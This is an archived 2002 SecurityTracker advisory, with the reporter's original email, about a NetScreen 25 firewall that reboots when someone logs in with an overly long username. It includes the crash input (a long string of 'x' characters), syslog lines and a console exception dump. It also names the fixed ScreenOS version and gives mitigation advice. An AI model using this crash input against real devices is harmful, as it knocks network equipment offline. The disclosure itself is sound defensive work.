SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Device (Firewall)  >  ScreenOS (NetScreen) Vendors:  NetScreen
NetScreen Firewall Can Be Made to Reboot By Remote Users That Send Long Usernames to the Device's Login Screen
SecurityTracker Alert ID:  1004383
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2002
Impact:  Denial of service via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): 3.0.1r1.1, Tested on NetScreen 25
Description:  A denial of service vulnerability was reported in the NetScreen 25 firewall device (which may apply to other models, as well). A remote user that has access to the login screen can cause the device to reboot.

A remote user can apparently login to the NetScreen device with the following username to cause the device to reboot:

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx

According to the report, the syslog log entries will only show that the NetScreen's interfaces have changed to 'Up' status.
Impact:  A remote user can cause the device to reboot, interrupting all existing connections.
Solution:  The author of the report indicates that the vendor has issued a fixed version (ScreenOS 3.0.1r2), but has not issued a security alert. According to the report, the release notes address the flaw (ref cs00232).

Contact the vendor for more information.
Vendor URL:  www.netscreen.com/support/alert.html (Links to External Site)
Cause:  Exception handling error
Reported By:  quentyn@fotango.com
Message History:   This archive entry has one or more follow-up message(s) listed below.
May 31 2002 (Vendor Issues Fix) Re: NetScreen Firewall Can Be Made to Reboot By Remote Users That Send Long Usernames to the Device's Login Screen
The vendor has issued a fix.


 Source Message Contents
Date:  Mon, 27 May 2002 18:33:31 +0100
From:  quentyn@fotango.com
Subject:  Netscreen 25 unauthorised reboot issue

 

 Please note that this advisory was prepared, before speaking to
Netscreen's US operation. Nothing of this vulnerability has been
discussed here ( or on vun-dev) hence this email. Additionally it is not
shown on netscreen's security alerts page
(http://www.netscreen.com/support/alert.html) as of 25.05.2002.

After speaking to their 3rd line support in the US (eventually) I was
informed
that this had been fixed.

Indeed problem *has* been fixed as of  ScreenOS 3.0.1r2 ( however you
have to look in the release notes to discover this - ref cs00232). I
wonder how many people are still running affected firmware ?
 
 #Synopsis
 
 A remote user ( who is un authenticated ) can cause a netscreen 25 (
other versions untested) to reboot remotely. Software Version 3.0.1r1.1 
which was current as of about 1 month ago and has no alerts shown
against it on netscreen's security alert's page.
 
 #Method
 
 Log on to the netscreen with a user name of
 

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx
 
 and the device reboots
 
 this looks similar to
 http://www.net-security.org/vuln.php?id=577
 from a year ago
 
 remote syslog shows just that the device's interfaces came back up
 

 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface trust
has
 changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface untrust
 has changed to Up (2002-05-24 13:36:47)
 May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra
 system-notification-00513: The physical state of the interface DMZ has
 changed to Up (2002-05-24 13:36:48)

##### Start of console output

phaedra-> *******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Instruction TLB Miss)
GPR:
R0: 78787878   R1: 03044e50  R2: 00470928  R3: 00000000
R4: 03044e08   R5: 000000ac  R6: 0074bde8  R7: 78787878
R8: 004c9d70   R9: 03a81d50  R10: 004fcb58 R11: 004d0000
R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878  R25: 78787878 R26: 78787878 R27: 78787878
R28: 78787878  R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024   XER: 00000000  LR: 78787878    CTR: 00000000
MSR: 00021200  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
SRR3: 00000000 DBSR: 00000000 TCR: fc000000   TSR: 04000000
ESR: 00000000  DEAR: 00000000 PID: 00000000
*******************************************************
                Exception Dump
*******************************************************
System up time: 3 hours 20 minutes 48 seconds
Exception(Machine Check)
GPR:
R0: 78787878   R1: 03044d68  R2: 00470928  R3: 00000000
R4: 00000000   R5: 00000000  R6: 78787878  R7: 002fffd4
R8: 004c9d70   R9: 00000000  R10: 000002ec R11: 00000020
R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
R24: 78787878  R25: 78787878 R26: 78787878 R27: 00000001
R28: 03044d94  R29: 0000001f R30: 78787878 R31: 00000000
Special Register:
CR: 40000024   XER: 20000000  LR: 002fffd4    CTR: 00000000
MSR: 00000000  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
SRR3: 00021200 DBSR: 00000000 TCR: fc000000   TSR: 0c000000
ESR: 00000000  DEAR: 00000000 PID: 00000000
Trace Dump:
00300044 002fffd4 002ff8f4 002fee04 00000000
System Level:
Image In Interrupt Level
********************************************************
        Please use GDB to track the trace
********************************************************
 

NetScreen PowerPC 405GP BootROM V1.01
(c)1997-2002 NetScreen Technologies Inc. All rights reserved

Check Platform...... NS-25

<snip normal netscreen start up>

###### End


 
#Preliminary Conclusions
 
restrict the IP's that can connect to the web interface.

and upgrade to the latest version of screen OS

#Vendor status

They had (as mentioned above) already fixed this issue , but had ( in my
personal opinion) not publicized it very well, hence this post.



 

-- 
#####################
Quentyn Taylor
Sysadmin - Fotango
#####################
"I just went visual on this goofy looking Finn riding on a gnu, wielding
one pissed off penguin...
gah" 
   Bob The Sane


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC